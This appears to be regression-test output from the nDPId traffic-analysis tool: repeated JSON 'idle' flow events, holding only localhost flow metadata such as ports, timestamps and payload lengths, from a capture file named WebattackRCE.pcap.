+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":535,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277536,"flow_last_seen":1576420277536,"flow_idle_time":7560000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":184,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50632,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":536,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277537,"flow_last_seen":1576420277537,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50634,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":537,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277538,"flow_last_seen":1576420277538,"flow_idle_time":7560000,"flow_min_l4_payload_len":151,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":151,"flow_avg_l4_payload_len":151,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50636,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":538,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277540,"flow_last_seen":1576420277540,"flow_idle_time":7560000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50638,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":539,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277543,"flow_last_seen":1576420277543,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50640,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":540,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277544,"flow_last_seen":1576420277544,"flow_idle_time":7560000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50642,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":541,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277546,"flow_last_seen":1576420277546,"flow_idle_time":7560000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50644,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":542,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277547,"flow_last_seen":1576420277547,"flow_idle_time":7560000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":159,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50646,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":543,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277549,"flow_last_seen":1576420277549,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50648,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":544,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277550,"flow_last_seen":1576420277550,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50650,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":545,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277552,"flow_last_seen":1576420277552,"flow_idle_time":7560000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50652,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":546,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277553,"flow_last_seen":1576420277553,"flow_idle_time":7560000,"flow_min_l4_payload_len":198,"flow_max_l4_payload_len":198,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":198,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50654,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":547,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277554,"flow_last_seen":1576420277554,"flow_idle_time":7560000,"flow_min_l4_payload_len":203,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":203,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50656,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":548,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277556,"flow_last_seen":1576420277556,"flow_idle_time":7560000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50658,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":549,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277558,"flow_last_seen":1576420277558,"flow_idle_time":7560000,"flow_min_l4_payload_len":204,"flow_max_l4_payload_len":204,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":204,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50660,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":550,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277560,"flow_last_seen":1576420277560,"flow_idle_time":7560000,"flow_min_l4_payload_len":206,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":206,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50662,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":551,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277561,"flow_last_seen":1576420277561,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50664,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":552,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277562,"flow_last_seen":1576420277562,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50666,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":553,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277564,"flow_last_seen":1576420277564,"flow_idle_time":7560000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50668,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":554,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277565,"flow_last_seen":1576420277565,"flow_idle_time":7560000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50670,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":555,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277566,"flow_last_seen":1576420277566,"flow_idle_time":7560000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50672,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":556,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277567,"flow_last_seen":1576420277567,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50674,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":557,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277568,"flow_last_seen":1576420277568,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50676,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":558,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277570,"flow_last_seen":1576420277570,"flow_idle_time":7560000,"flow_min_l4_payload_len":161,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":161,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50678,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":559,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277572,"flow_last_seen":1576420277572,"flow_idle_time":7560000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50680,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":560,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277574,"flow_last_seen":1576420277574,"flow_idle_time":7560000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":168,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50682,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":561,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277575,"flow_last_seen":1576420277575,"flow_idle_time":7560000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50684,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":562,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277577,"flow_last_seen":1576420277577,"flow_idle_time":7560000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50686,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":563,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277578,"flow_last_seen":1576420277578,"flow_idle_time":7560000,"flow_min_l4_payload_len":195,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":195,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50688,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":564,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277580,"flow_last_seen":1576420277580,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50690,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":565,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277581,"flow_last_seen":1576420277581,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50692,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":566,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277583,"flow_last_seen":1576420277583,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50694,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":567,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277584,"flow_last_seen":1576420277584,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50696,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":568,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277586,"flow_last_seen":1576420277586,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50698,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":569,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277588,"flow_last_seen":1576420277588,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50700,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":570,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277590,"flow_last_seen":1576420277590,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50702,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":571,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277592,"flow_last_seen":1576420277592,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50704,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":572,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277593,"flow_last_seen":1576420277593,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50706,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":573,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277595,"flow_last_seen":1576420277595,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50708,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":574,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277597,"flow_last_seen":1576420277597,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50710,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":575,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277598,"flow_last_seen":1576420277598,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50712,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":576,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277600,"flow_last_seen":1576420277600,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50714,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":577,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277602,"flow_last_seen":1576420277602,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50716,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":578,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277604,"flow_last_seen":1576420277604,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50718,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":579,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277607,"flow_last_seen":1576420277607,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50720,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":580,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277608,"flow_last_seen":1576420277608,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50722,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":581,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277609,"flow_last_seen":1576420277609,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50724,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 